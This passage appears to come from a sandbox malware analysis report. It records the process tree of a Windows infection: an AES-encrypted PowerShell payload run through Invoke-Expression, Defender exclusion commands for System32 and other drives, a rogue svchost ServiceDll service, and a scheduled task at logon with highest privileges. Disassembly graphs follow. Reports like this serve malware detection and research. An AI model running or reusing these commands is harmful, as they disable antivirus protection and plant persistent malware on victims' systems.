          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:33
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:34
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:35
          Start time:01:40:13
          Start date:30/08/2024
          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
          Imagebase:0x7ff61b2b0000
          File size:468'120 bytes
          MD5 hash:B3676839B2EE96983F9ED735CD044159
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:36
          Start time:01:40:13
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:38
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:39
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:40
          Start time:01:40:37
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:41
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:42
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:43
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\sc.exe
          Wow64 process (32bit):false
          Commandline:sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
          Imagebase:0x7ff740850000
          File size:72'192 bytes
          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:44
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
          Imagebase:0x7ff6cfff0000
          File size:77'312 bytes
          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:45
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\sc.exe
          Wow64 process (32bit):false
          Commandline:sc start x338625
          Imagebase:0x7ff7ca9b0000
          File size:72'192 bytes
          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:46
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:false

          General

          Target ID:47
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:48
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:49
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:50
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:51
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\console_zero.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\console_zero.exe"
          Imagebase:0x7ff783490000
          File size:482'304 bytes
          MD5 hash:7D5124735B17F17AB3DACBA515C397F0
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 75%, ReversingLabs
          • Detection: 72%, Virustotal, Browse
          Has exited:true

          General

          Target ID:52
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\timeout.exe
          Wow64 process (32bit):false
          Commandline:timeout /t 10 /nobreak
          Imagebase:0x7ff73a2b0000
          File size:32'768 bytes
          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:53
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:54
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:55
          Start time:01:40:44
          Start date:30/08/2024
          Path:C:\Windows\System32\schtasks.exe
          Wow64 process (32bit):false
          Commandline:schtasks /delete /tn "console_zero" /f
          Imagebase:0x7ff7b50c0000
          File size:235'008 bytes
          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:56
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:57
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:58
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:59
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:60
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\schtasks.exe
          Wow64 process (32bit):false
          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Imagebase:0x7ff7b50c0000
          File size:235'008 bytes
          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:61
          Start time:01:40:45
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:62
          Start time:01:40:47
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:63
          Start time:01:40:47
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:64
          Start time:01:40:48
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:65
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:66
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:67
          Start time:01:40:50
          Start date:30/08/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
          Imagebase:0x7ff711290000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:2.9%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0%
            Total number of Nodes:3
            Total number of Limit Nodes:0
            execution_graph 41158 7ff9c5147dd1 41159 7ff9c5147ddf GetFileAttributesW 41158->41159 41161 7ff9c5147e86 41159->41161

            Executed Functions

            Function 00007FF9C5141348 Relevance: 4.2, Strings: 3, Instructions: 488COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 7ff9c5141348-7ff9c51413e4 12 7ff9c5141419-7ff9c51414e4 0->12 13 7ff9c51413e6-7ff9c5141418 0->13 32 7ff9c5141518-7ff9c514156f 12->32 33 7ff9c51414e6-7ff9c5141515 12->33 13->12 43 7ff9c51415b9-7ff9c51415d6 32->43 44 7ff9c5141571-7ff9c514159b call 7ff9c5140150 32->44 33->32 48 7ff9c51415d8-7ff9c51415da 43->48 49 7ff9c5141647-7ff9c5141650 43->49 47 7ff9c51415a0-7ff9c51415b0 call 7ff9c5140448 call 7ff9c51405a8 44->47 67 7ff9c51415b2-7ff9c51415b6 47->67 68 7ff9c5141621-7ff9c5141622 47->68 51 7ff9c51415dc 48->51 52 7ff9c5141656 48->52 49->52 54 7ff9c51415de-7ff9c51415ee 51->54 55 7ff9c5141623-7ff9c5141636 51->55 57 7ff9c5141658-7ff9c514165e 52->57 71 7ff9c51415f0-7ff9c514160a 54->71 72 7ff9c514161d-7ff9c514161e 54->72 63 7ff9c5141637-7ff9c5141645 55->63 60 7ff9c5141660-7ff9c5141663 57->60 61 7ff9c51416b7-7ff9c51416c6 call 7ff9c5140768 57->61 65 7ff9c51416e4-7ff9c514170b call 7ff9c51407f8 60->65 66 7ff9c5141665-7ff9c5141676 60->66 79 7ff9c51416cb-7ff9c51416df call 7ff9c51407f0 61->79 63->49 89 7ff9c5141719 65->89 90 7ff9c514170d-7ff9c5141717 65->90 73 7ff9c514167b-7ff9c5141689 66->73 67->63 74 7ff9c51415b8 67->74 68->55 71->73 88 7ff9c514160c-7ff9c514160f 71->88 72->68 75 7ff9c514168b-7ff9c51416b6 73->75 74->43 75->61 79->65 88->75 92 7ff9c5141611 88->92 93 7ff9c514171e-7ff9c5141720 89->93 90->93 92->57 94 7ff9c5141613-7ff9c5141618 call 7ff9c5140598 92->94 96 7ff9c5141722-7ff9c514173f call 7ff9c5140d18 93->96 97 7ff9c5141757-7ff9c5141764 call 7ff9c5140308 93->97 94->72 104 7ff9c5141744-7ff9c5141755 96->104 101 7ff9c5141766-7ff9c514176b call 7ff9c51409e8 97->101 105 7ff9c5141770-7ff9c514177d call 7ff9c51409f0 101->105 104->101 109 7ff9c5141799-7ff9c514179d 105->109 110 7ff9c514177f-7ff9c5141797 105->110 111 7ff9c514179f-7ff9c51417d5 call 7ff9c5140880 call 7ff9c51418d6 109->111 110->111
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$2M_I$3M_I
            • API String ID: 0-2384463353
            • Opcode ID: be444eca2d11449acfd8ca3d2d744fab8e6c9d34a3285268f6bfd0d27d9292a5
            • Instruction ID: 3bdc9574c0d2ea9924694fda86160c2f2491f7214b09d923e6e891a54df2e677
            • Opcode Fuzzy Hash: be444eca2d11449acfd8ca3d2d744fab8e6c9d34a3285268f6bfd0d27d9292a5
            • Instruction Fuzzy Hash: B2F1E522E4E9864FE761DF6858593B97AE0FF46B21F4811BAC04CCB18BDF94EC018B51
            Function 00007FF9C58B26F3 Relevance: 1.9, Strings: 1, Instructions: 620COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 308 7ff9c58b26f3-7ff9c58b26f5 309 7ff9c58b26f7-7ff9c58b26fb 308->309 310 7ff9c58b276f-7ff9c58b277b 308->310 311 7ff9c58b277c 309->311 312 7ff9c58b26fd-7ff9c58b270e 309->312 310->311 313 7ff9c58b277f-7ff9c58b2785 311->313 312->313 314 7ff9c58b2710 312->314 315 7ff9c58b2787-7ff9c58b27d2 313->315 316 7ff9c58b27d5-7ff9c58b27d8 313->316 314->310 315->316 317 7ff9c58b288a-7ff9c58b288d 316->317 318 7ff9c58b27de-7ff9c58b27e2 316->318 320 7ff9c58b2893-7ff9c58b2897 317->320 321 7ff9c58b29ee-7ff9c58b29f2 317->321 318->317 319 7ff9c58b27e8-7ff9c58b2833 318->319 319->317 357 7ff9c58b2835-7ff9c58b2887 319->357 320->321 325 7ff9c58b289d-7ff9c58b28a6 320->325 323 7ff9c58b29f8-7ff9c58b29fb 321->323 324 7ff9c58b2b80-7ff9c58b2b8c 321->324 323->324 328 7ff9c58b2a01-7ff9c58b2a05 323->328 326 7ff9c58b2bf7-7ff9c58b2bfa 324->326 327 7ff9c58b2b8e-7ff9c58b2b8f 324->327 330 7ff9c58b3012-7ff9c58b3032 call 7ff9c58b307a 325->330 333 7ff9c58b3007-7ff9c58b300c 326->333 334 7ff9c58b2c00-7ff9c58b2c06 326->334 331 7ff9c58b2b93 327->331 328->324 332 7ff9c58b2a0b-7ff9c58b2a28 328->332 331->326 336 7ff9c58b2b95-7ff9c58b2bae 331->336 332->324 351 7ff9c58b2a2e-7ff9c58b2a33 332->351 333->330 337 7ff9c58b2c77-7ff9c58b2c7b 334->337 338 7ff9c58b2c08-7ff9c58b2c0a 334->338 336->326 343 7ff9c58b2bb0-7ff9c58b2bf1 336->343 341 7ff9c58b2f54-7ff9c58b2f5c 337->341 342 7ff9c58b2c81-7ff9c58b2c82 337->342 345 7ff9c58b2c86 338->345 346 7ff9c58b2c0c 338->346 341->333 349 7ff9c58b2f62-7ff9c58b2fc8 341->349 342->345 343->326 350 7ff9c58b2e18-7ff9c58b2e42 343->350 347 7ff9c58b2c11-7ff9c58b2c2c 345->347 348 7ff9c58b2c88-7ff9c58b2c8c 345->348 346->331 352 7ff9c58b2c0e 346->352 358 7ff9c58b2c32-7ff9c58b2c39 347->358 359 7ff9c58b2ee0-7ff9c58b2eea 347->359 348->341 354 7ff9c58b2c8e-7ff9c58b2ca2 348->354 361 7ff9c58b2fd2-7ff9c58b2fe4 349->361 382 7ff9c58b2e48-7ff9c58b2e5b 350->382 355 7ff9c58b2b39-7ff9c58b2b49 351->355 356 7ff9c58b2a39-7ff9c58b2a5d 351->356 352->347 354->341 372 7ff9c58b2ca8-7ff9c58b2cc4 354->372 373 7ff9c58b2b4b-7ff9c58b2b7e 355->373 389 7ff9c58b2ad2-7ff9c58b2b37 356->389 390 7ff9c58b2a5f-7ff9c58b2ad0 356->390 357->317 358->333 362 7ff9c58b2c3f-7ff9c58b2c46 358->362 361->333 365 7ff9c58b2fe6-7ff9c58b2fff 361->365 370 7ff9c58b2c4c-7ff9c58b2c53 362->370 371 7ff9c58b2eef-7ff9c58b2ef6 362->371 365->333 370->333 374 7ff9c58b2c59-7ff9c58b2c5e 370->374 386 7ff9c58b2efe-7ff9c58b2f10 371->386 383 7ff9c58b2d03-7ff9c58b2d37 372->383 384 7ff9c58b2cc6-7ff9c58b2cf8 372->384 373->324 374->333 379 7ff9c58b2c64-7ff9c58b2c71 374->379 379->337 379->341 393 7ff9c58b2e5d-7ff9c58b2ec7 382->393 383->386 384->383 392 7ff9c58b2f27-7ff9c58b2f51 386->392 389->373 390->373 392->341 393->392 413 7ff9c58b2ec9-7ff9c58b2ed9 393->413 413->359
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: 948ea2f35f21f51c16d417c79b21b0b7c97fe1ea4a9d462c51ead5da8a766418
            • Instruction ID: fa94716c00adfd42fd47f4250772e65362a86cde342557b22db05139f099bbb1
            • Opcode Fuzzy Hash: 948ea2f35f21f51c16d417c79b21b0b7c97fe1ea4a9d462c51ead5da8a766418
            • Instruction Fuzzy Hash: D7227370A18A5A8FEBA8DF1888957B977E1FF59700F0445B9D44ED3292CE78B881CF41
            Function 00007FF9C550EF5A Relevance: .6, Instructions: 575COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 598 7ff9c550ef5a-7ff9c550ef5e 599 7ff9c550efbc-7ff9c550efc9 598->599 600 7ff9c550ef61-7ff9c550ef66 598->600 601 7ff9c550efcb 599->601 602 7ff9c550efcc-7ff9c550f046 599->602 601->602 606 7ff9c550f058 602->606 607 7ff9c550f048-7ff9c550f056 602->607 608 7ff9c550f05d-7ff9c550f05f 606->608 607->608 609 7ff9c550f071-7ff9c550f078 608->609 610 7ff9c550f061-7ff9c550f06f 608->610 611 7ff9c550f07a-7ff9c550f08f 609->611 610->609 614 7ff9c550f094-7ff9c550f0f4 611->614 620 7ff9c550f16b-7ff9c550f19c 614->620 621 7ff9c550f0f6-7ff9c550f130 614->621 625 7ff9c550f1a2-7ff9c550f1f6 620->625 626 7ff9c550f315-7ff9c550f32b call 7ff9c550f50f 620->626 630 7ff9c550f13c-7ff9c550f169 621->630 631 7ff9c550f132 621->631 644 7ff9c550f1fc-7ff9c550f21b 625->644 645 7ff9c550f2dd-7ff9c550f2eb call 7ff9c550f4c8 625->645 635 7ff9c550f32d-7ff9c550f338 626->635 636 7ff9c550f398-7ff9c550f3ec 626->636 630->620 630->621 631->630 639 7ff9c550f33a-7ff9c550f35b 635->639 640 7ff9c550f391-7ff9c550f396 635->640 667 7ff9c550f41d-7ff9c550f454 636->667 668 7ff9c550f3ee-7ff9c550f416 636->668 639->640 658 7ff9c550f35d-7ff9c550f372 639->658 640->635 640->636 651 7ff9c550f21d-7ff9c550f222 644->651 652 7ff9c550f224 644->652 654 7ff9c550f2ed-7ff9c550f2f5 645->654 655 7ff9c550f2f7-7ff9c550f30f 645->655 656 7ff9c550f226-7ff9c550f228 651->656 652->656 654->626 654->655 655->625 655->626 660 7ff9c550f22e-7ff9c550f238 656->660 661 7ff9c550f2bf-7ff9c550f2d7 656->661 669 7ff9c550f37b 658->669 670 7ff9c550f374-7ff9c550f379 658->670 663 7ff9c550f24a-7ff9c550f25a 660->663 664 7ff9c550f23a-7ff9c550f248 660->664 661->644 661->645 676 7ff9c550f25d-7ff9c550f265 663->676 664->663 664->676 678 7ff9c550f456-7ff9c550f472 667->678 679 7ff9c550f4b8-7ff9c550f4c6 667->679 668->667 673 7ff9c550f37d-7ff9c550f37f 669->673 670->673 673->640 677 7ff9c550f381-7ff9c550f38a 673->677 681 7ff9c550f296-7ff9c550f299 676->681 682 7ff9c550f267-7ff9c550f287 676->682 677->640 686 7ff9c550f47e-7ff9c550f4b6 678->686 687 7ff9c550f474 678->687 681->661 685 7ff9c550f29b-7ff9c550f2aa 681->685 682->681 688 7ff9c550f289-7ff9c550f28e 682->688 685->661 691 7ff9c550f2ac-7ff9c550f2b8 685->691 686->678 686->679 687->686 688->681 691->661
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9b2a9fcf8f3d6c3f38abac18e8ad52ced04d2b0bdc4bda11b202bef4cc4b7e50
            • Instruction ID: de96da5b8b68550bfd8752857ba18571f5ebc11ad9e76f2d008e84974f71a86c
            • Opcode Fuzzy Hash: 9b2a9fcf8f3d6c3f38abac18e8ad52ced04d2b0bdc4bda11b202bef4cc4b7e50
            • Instruction Fuzzy Hash: 5102D235A0CA8B4FEB94DF1898657B977E1EF9A700F940079D44ED32C6DE66B842CB40
            Function 00007FF9C550EFA9 Relevance: .6, Instructions: 571COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
